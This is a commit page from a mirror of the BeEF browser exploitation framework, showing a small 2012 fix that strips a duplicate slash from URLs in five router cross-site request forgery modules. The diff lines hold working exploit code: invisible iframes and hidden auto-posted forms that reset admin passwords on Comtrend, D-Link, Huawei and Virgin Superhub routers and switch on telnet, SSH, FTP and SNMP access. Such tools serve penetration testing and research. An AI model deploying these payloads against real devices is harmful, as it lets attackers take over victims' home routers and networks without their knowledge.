Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Removed duplicate / from a few CSRF URLs

Browse Source 
Just in case it causes issues
This commit is contained in:
bcoles
2012-06-25 00:57:26 +09:30
parent 7fde875d8a
commit 9440afacc9
5 changed files with 6 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/router/comtrend_ct5367_csrf/command.js
View File

@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "/password.cgi");
form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;

2
modules/exploits/router/comtrend_ct5624_csrf/command.js
View File

@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);

2
modules/exploits/router/dlink_dsl500t_csrf/command.js
View File

@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},

2
modules/exploits/router/huawei_smartax_mt880/command.js
View File

@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

2
modules/exploits/router/virgin_superhub_csrf/command.js
View File

@@ -18,7 +18,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}